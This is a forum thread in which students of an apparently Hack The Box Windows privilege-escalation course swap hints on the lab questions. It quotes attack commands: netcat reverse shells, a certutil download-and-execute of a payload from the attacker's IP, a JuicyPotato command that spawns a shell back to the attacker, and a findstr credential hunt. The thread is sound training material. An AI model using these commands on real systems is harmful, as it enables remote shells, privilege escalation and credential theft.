Windows Privilege Escalation Skills Assessment - Part I (Question N.2)

I solved all the questions but not the second question:
Find the password for the ldapadmin account somewhere on the system.
Where is this password in the system? I searched with LaZagne and other string commands.
Tnx

Hi, I'm actually earlier in this module, on the “vulnerable services” section. Were you able to get that exploit described in that lesson working?

Yes tnx

Ya, I managed to get it to work; I had to use the Pwnbox. I think a firewall or network setting on the normal virtual machine I was using was blocking the connection for the reverse shell.

Though I could use a tip on the credential hunting section. For the question:

“Search the file system for a file containing a password. Submit the password as your answer.”

I did indeed find a file containing a password when searching C:\Users\htb-student\Documents\

But when I enter that password as the flag, it's not being accepted. Is there another one, or is this some kind of error in the module?

What is the section? And type here the password you found.

In Windows Privilege Escalation module - on the section titled “credential hunting”

found stuff.txt at

c:\Users\htb-student\Documents\stuff.txt

contains the string <password: l#-x9r11_2_GL!>

I see my note.
I use this command
PS C:\htb> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
I find an XML element. I read this.

OK, thank you, I ended up finding the correct password. I realized there are many passwords for this section, and found the right one.

OK, I'm now on Windows Privilege Escalation Skills Assessment - Part I.

I’m stuck at the beginning, on the initial foothold. I see the website being hosted by the target is vulnerable to Windows CMD command injection.

The lesson tells us to exploit this and get a reverse shell, though the couple of reverse shells I have tried have all failed so far.

After setting up a netcat listener, I've tried injecting these commands:

nc.exe -e cmd “attack ip” “port”

nc.exe -e cmd.exe “attack ip” “port”

certutil.exe -urlcache -split -f http://“attack ip”:“port”/beacon.exe C:\Windows\Temp\beacon.exe & C:\Windows\Temp\beacon.exe

None seemed to work; I'm not getting a reverse shell.

Can you give me a tip on this?

Hi man, you want information about the skill assessment in windows privilege escalation module (question 1)?

Yes, I got some help and found a way to get a reverse shell. Though now I am trying to escalate privileges.

The obvious paths of using JuicyPotato or PrintSpoofer don't seem to work. Any tip on the privilege escalation path?

Yes, so use JuicyPotato and one of these processes:

Thanks for the hint. I'm a newb when it comes to Windows. What am I supposed to do with all these CLSIDs? I only know how to use the JuicyPotato.exe on the main page.

OK, I read how to use the CLSID using the -c switch, but after trying a few of them, none of them worked. Still getting:

Input

c:\Windows\Temp\JuicyPotato.exe -l 53375 -c 0134A8B2-3407-4B45-AD25-E9F7C92A80BC -p c:\windows\system32\cmd.exe -a “/c c:\Windows\Temp\nc.exe 10.10.14.135 443 -e cmd.exe” -t *

Output

Testing 0134A8B2-3407-4B45-AD25-E9F7C92A80BC 53375
COM -> recv failed with error: 10038

Try putting the CLSID into {} and quote the parameter

Can you show an example? You mean like this? "-c {0134A8B2-3407-4B45-AD25-E9F7C92A80BC} "

OK, looking at the GitHub page I found the right syntax, and ended up successfully escalating privileges on the box.

Did you find the password “somewhere” on the system?

Did you end up finding the answer to this question?

hi